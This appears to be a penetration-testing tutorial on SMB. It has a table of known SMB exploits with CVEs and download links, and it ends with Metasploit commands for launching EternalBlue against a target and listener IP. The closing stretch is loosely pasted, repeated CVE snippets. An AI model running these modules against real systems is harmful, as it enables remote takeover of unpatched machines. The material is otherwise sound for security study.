SMB is a client-server communication protocol used for sharing resources on a network.  Server Message Block (SMB) allows clients to read from and write to a server service, providing core authentication and communications for Windows file and print servers. It was (and is) so popular that *nix operating systems created their own compatible Samba service for Windows/Unix/Linux interoperability. SMB also has one of the longest vulnerability histories of any network protocol in use today (www.cvedetails.com lists almost 2,700 SMB-related vulnerabilities). Despite having been updated several times by Microsoft, new vulnerabilities continue to emerge. Most apply to the Windows version, but some impact Samba as well.

The SMB protocol is known as a response-request protocol, meaning that it transmits multiple messages between the client and server to establish a connection. Clients connect to servers using TCP/IP (actually NetBIOS over TCP/IP as specified in RFC1001 and RFC1002), NetBEUI or IPX/SPX.

How does SMB work?

Once they have established a connection, clients can then send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and generally do all the sort of things that you want to do with a file system. However, in the case of SMB, these things are done over the network.

SMB is normally over port 139 or 445 after Windows 2000.

Exploit-db.com lists 61 exploits related to SMB, dating from 1995 to the present. Packetstormsecurity.com lists 314. Metasploit has 43 in its database. The following table summarizes a few of the more notable ones.

Exploit

Description

Tool Location

Microsoft Windows SMB Client Null Pointer Dereference Denial of Service

CVE-2018-0833. Null pointer deference DoS. Works against SMB 2.0 & 3.0. Affected systems: Windows 8.1, 2012 R2. Currently no Microsoft Advisory number.

https://packetstormsecurity.com/files/146593/Microsoft-Windows-8.1-2012-R2-SMB-Denial-Of-Service.html

Microsoft Windows SMB Server (v1/v2) - Mount Point Arbitrary Device Open Privilege Escalation

CVE-2018-0749. Allows privilege escalation. Affected systems: Windows 10 (1703 and 1709), 8.1, 7. Currently no Microsoft Advisory number.

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43517.zip

EternalBlue/EternalRomance/EternalSynergy/EternalChampion (MS17-010)

CVE-2017-0143, CVE-2017-0146, CVE-2017-0147. Allows arbitrary remote code execution. Variants: MS17-010 SMB Remote Windows Kernel Pool Corruption, MS17-010 SMB RCE Detection, MS17-010 SMB Remote Windows Command Execution. Affected systems: Windows Vista SP2 through Server 2016, both 32- and 64-bit.

Shadow Brokers Fuzzbunch, Metasploit modules: exploit/windows/smb/ms17_010_eternalblue, exploit/windows/smb/ms17_010_psexec, auxiliary/admin/smb/ms17_010_command

Windows Redirect-to-SMB (2017)

CVE-ID (unknown). Exploits urlmon.dll API functions. Attacker sends malicious link with redirect to file:// URL. Windows automatically tries to authenticate to the malicious SMB server with the victim's credentials, which can then be harvested. Affected systems: Windows 8.1, 10, Server 2012 R2, Server 2016. Currently no Microsoft Advisory number. Based on early Internet Explorer exploits reported in by insecure.org in 1997 (IE Bug #4, MS Security Advisory 974926).

www.secureworks.com/blog/attacking-windows-smb-zero-day-vulnerability

LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)

CVE-2016-7237. Remote memory corruption. Can allow DoS or elevation of privilege. Affected systems: Windows XP, Server 2003, Vista, 7, 8.1, Server 2008 R2, Server 2012/2012 R2, 10, Server 2016.

www.exploit-db.com/exploits/40744

SMB Relay Code Execution (MS08-068)

CVE-2008-4037. NTLM replay attack. Allows arbitrary remote code execution. Affected systems: Windows 2000 SP4, XP SP 2/3, Server 2003 SP1/2, Vista, Server 2008.

Metasploit module: exploit/windows/smb/smb_relay, https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/7125.zip

Microsoft Server Service Relative Path Stack Corruption (MS08-067)

CVE-2008-4250. Allows arbitrary remote code execution. Vulnerability in NetAPI32.dll. Updates MS06-040. Has variants. Affected systems: All editions/service packs of Windows Server 2000, XP, Server 2003.

Metasploit module: exploit/windows/smb/ms08_067_netapi, https://www.exploit-db.com/exploits/7104/, https://www.exploit-db.com/exploits/40279/

Microsoft Local Privilege Escalation (MS06-030)

CVE-2006-2373. Allows elevation of privilege. Disables ReadOnly Memory protection in Registry. Affected systems: Windows 2000 SP4, XP SP0/1/2, Server 2003.

www.exploit-db.com/exploits/1911

Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (1) and (2) (MS02-045)

CVE-2002-0724. Boundary condition error. Affected systems: Windows XP SP0 (all editions), NT 4.0 (all editions, all service packs), Windows 2000 (all editions, all service packs).

https://www.securityfocus.com/bid/5556/exploit, https://packetstormsecurity.com/files/26596/SMBdie.zip.html,https://packetstormsecurity.com/search/?q=smbnuke.c

Note: To search Metasploit for SMB-related exploits, at the msf console, enter search smb type:exploit.

Note: To retrieve a count of how many SMB-related exploits are in the Metasploit database, at the Metasploit console, enter grep -c smb search exploit.

An example of a critical error:

Microsoft Security Bulletin MS17-010 - Critical
This security update resolves vulnerabilities in Microsoft Windows, related to remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.

If you are lucky enough to find an unpatched box, Metasploit has an exploit built to run that only requires a target and listener IP address.

Fire up Metasploit with the msfconsole command

use exploit/windows/smb/ms17_010_eternalblue

or

msf6 > use exploit/windows/smb/ms17_010_psexecmsf6
exploit(windows/smb/ms17_010_psexec) > set RHOSTS {Target-IP}msf6
exploit(windows/smb/ms17_010_psexec) > set LHOST {Your-IP}msf6
exploit(windows/smb/ms17_010_psexec) > exploit
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - ‘EternalBlue’ SMB Remote Code Execution (MS17-010)
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - ‘EternalBlue’ SMB Remote Code Execution (MS17-010). CVE-2017-0144 . remote exploit for Windows platform
CVE-2017-0144 : The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows
CVE-2017-0144 : The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted…
CVE -CVE-2017-0144
CVE® is a list of records — each containing an identification number, a description, and at least one public reference — for publicly known cybersecurity vulnerabilities. The mission of the CVE Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities.

https://www.cisecurity.org/wp-content/uploads/2019/01/Security-Primer-EternalBlue.pdf